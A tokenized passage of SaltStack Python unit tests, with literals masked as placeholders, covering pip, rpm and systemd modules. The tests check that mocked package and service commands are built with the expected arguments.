<NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = install_options [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> install_options [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_global_options_argument_in_resulting_command ( self ) : <EOL> global_options = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in global_options : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = global_options ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = '<STR_LIT:U+002C>' . join ( global_options ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = global_options [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , global_options [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_upgrade_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , upgrade = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_force_reinstall_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , force_reinstall = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_ignore_installed_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , ignore_installed = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_deps_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_deps = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_install_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_install = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_proxy_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> proxy = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , proxy = proxy ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , proxy , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_multiple_requirements_arguments_in_resulting_command ( self , get_cached_requirements ) : <EOL> cached_reqs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> requirements = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in cached_reqs : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = requirements ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = '<STR_LIT:U+002C>' . join ( requirements ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = [ cached_reqs [ <NUM_LIT:0> ] ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = requirements [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , cached_reqs [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_uninstall_multiple_requirements_arguments_in_resulting_command ( self , get_cached_requirements ) : <EOL> cached_reqs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> requirements = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in cached_reqs : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = requirements ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = '<STR_LIT:U+002C>' . join ( requirements ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = [ cached_reqs [ <NUM_LIT:0> ] ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = requirements [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , cached_reqs [ <NUM_LIT:0> ] ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_uninstall_proxy_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> proxy = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , proxy = proxy ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , proxy , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_uninstall_log_argument_in_resulting_command ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , log = log_path ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , log_path , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock_path . exists . side_effect = IOError ( '<STR_LIT>' ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> IOError , <EOL> pip . uninstall , <EOL> pkg , <EOL> log = log_path <EOL> ) <EOL> def test_uninstall_timeout_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> expected_prefix = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , timeout = <NUM_LIT:10> ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ <NUM_LIT:10> , pkg ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , timeout = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ '<STR_LIT>' , pkg ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> pip . uninstall , <EOL> pkg , <EOL> timeout = '<STR_LIT:a>' <EOL> ) <EOL> def test_freeze_command ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock = MagicMock ( <EOL> return_value = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:\n>' . join ( eggs ) <EOL> } <EOL> ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret = pip . freeze ( ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( ret , eggs ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . freeze , <EOL> ) <EOL> def test_list_command ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock_version = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:\n>' . join ( eggs ) } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = mock_version ) ) : <EOL> ret = pip . list_ ( ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( <EOL> ret , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : mock_version , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . list_ , <EOL> ) <EOL> def test_list_command_with_prefix ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock = MagicMock ( <EOL> return_value = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:\n>' . join ( eggs ) <EOL> } <EOL> ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret = pip . list_ ( prefix = '<STR_LIT>' ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( <EOL> ret , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ) <EOL> def test_install_pre_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( side_effect = [ <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> pip . install ( pkg , pre_releases = True ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock_run = MagicMock ( return_value = '<STR_LIT>' ) <EOL> mock_run_all = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock_run , <EOL> '<STR_LIT>' : mock_run_all } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> pip . install ( pkg , pre_releases = True ) <EOL> mock_run_all . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( PipTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import rpm <EOL> rpm . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class RpmTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_list_pkgs ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . list_pkgs ( ) , { } ) <EOL> def test_verify ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . verify ( '<STR_LIT>' ) , { } ) <EOL> def test_file_list ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . file_list ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } ) <EOL> def test_file_dict ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . file_dict ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ ] , '<STR_LIT>' : { } } ) <EOL> def test_owner ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( rpm . owner ( ) , '<STR_LIT>' ) <EOL> ret = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = ret ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( rpm . owner ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . owner ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ret ) <EOL> @ patch ( '<STR_LIT>' , True ) <EOL> def test_version_cmp_rpm ( self ) : <EOL> '''<STR_LIT>''' <EOL> rpm . rpm = MagicMock ( return_value = MagicMock ) <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = <NUM_LIT:0> ) ) : <EOL> self . assertEqual ( <NUM_LIT:0> , rpm . version_cmp ( '<STR_LIT:1>' , '<STR_LIT:2>' ) ) <EOL> @ patch ( '<STR_LIT>' , False ) <EOL> def test_version_cmp_fallback ( self ) : <EOL> '''<STR_LIT>''' <EOL> rpm . rpm = MagicMock ( return_value = MagicMock ) <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = <NUM_LIT:0> ) ) : <EOL> self . assertEqual ( - <NUM_LIT:1> , rpm . version_cmp ( '<STR_LIT:1>' , '<STR_LIT:2>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( RpmTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> from salt . exceptions import CommandExecutionError <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import systemd <EOL> systemd . __salt__ = { } <EOL> systemd . __context__ = { } <EOL> _SYSTEMCTL_STATUS = { <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '''<STR_LIT>''' <EOL> } <EOL> _LIST_UNIT_FILES = '''<STR_LIT>''' <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class SystemdTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_systemctl_reload ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> ] ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaisesRegexp ( <EOL> CommandExecutionError , <EOL> '<STR_LIT>' , <EOL> systemd . systemctl_reload <EOL> ) <EOL> self . assertTrue ( systemd . systemctl_reload ( ) ) <EOL> def test_get_enabled ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_mock = MagicMock ( return_value = _LIST_UNIT_FILES ) <EOL> listdir_mock = MagicMock ( return_value = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> sd_mock = MagicMock ( <EOL> return_value = set ( <EOL> [ x . replace ( '<STR_LIT>' , '<STR_LIT>' ) for x in _SYSTEMCTL_STATUS ] <EOL> ) <EOL> ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> sysv_enabled_mock = MagicMock ( side_effect = lambda x : x == '<STR_LIT>' ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : cmd_mock } ) : <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , sd_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , <EOL> sysv_enabled_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . get_enabled ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_get_disabled ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_mock = MagicMock ( return_value = _LIST_UNIT_FILES ) <EOL> listdir_mock = MagicMock ( return_value = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> sd_mock = MagicMock ( <EOL> return_value = set ( <EOL> [ x . replace ( '<STR_LIT>' , '<STR_LIT>' ) for x in _SYSTEMCTL_STATUS ] <EOL> ) <EOL> ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> sysv_enabled_mock = MagicMock ( side_effect = lambda x : x == '<STR_LIT>' ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : cmd_mock } ) : <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , sd_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , <EOL> sysv_enabled_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . get_disabled ( ) , <EOL> [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_get_all ( self ) : <EOL> '''<STR_LIT>''' <EOL> listdir_mock = MagicMock ( side_effect = [ <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ] ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . get_all ( ) , <EOL> [ '<STR_LIT:bar>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_available ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = lambda x : _SYSTEMCTL_STATUS [ x ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertTrue ( systemd . available ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( systemd . available ( '<STR_LIT>' ) ) <EOL> def test_missing ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = lambda x : _SYSTEMCTL_STATUS [ x ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( systemd . missing ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( systemd . missing ( '<STR_LIT>' ) ) <EOL> def test_show ( self ) : <EOL> '''<STR_LIT>''' <EOL> show_output = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = show_output ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( <EOL> systemd . show ( '<STR_LIT>' ) , <EOL> { '<STR_LIT:a>' : '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' : '<STR_LIT:d>' , <EOL> '<STR_LIT:e>' : { '<STR_LIT:f>' : '<STR_LIT:g>' , '<STR_LIT:h>' : '<STR_LIT:i>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> ) <EOL> def test_execs ( 